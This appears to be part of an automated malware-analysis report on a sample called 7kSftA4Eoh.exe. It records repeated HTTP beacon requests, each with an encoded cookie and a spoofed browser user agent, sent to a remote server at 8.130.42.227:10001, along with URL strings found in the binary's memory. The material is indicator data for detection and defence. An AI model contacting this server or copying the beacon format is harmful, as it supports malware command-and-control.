            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/2yMe
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/2yMeP
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/2yMeq7
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3120649557.0000000000195000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2486331927.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3031168430.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2132660259.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3065050959.0000000000197000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2475694262.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2949804872.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2099991629.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2984468347.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2973424175.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3019731119.0000000000198000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2454151218.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2034975123.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.3042669093.0000000000195000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357124729.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2056644230.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js#?
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2067405841.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497532252.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2078222580.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2177812007.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2121871297.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js0
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125724436.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js3
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2639548955.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2520838322.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2018585370.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2324563494.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js5
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2520838322.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2177812007.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js:
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js=?
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js=D
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2357124729.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2335515707.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2346423893.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.js?
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsB4
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsJ4
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/en_US/all.jsR4
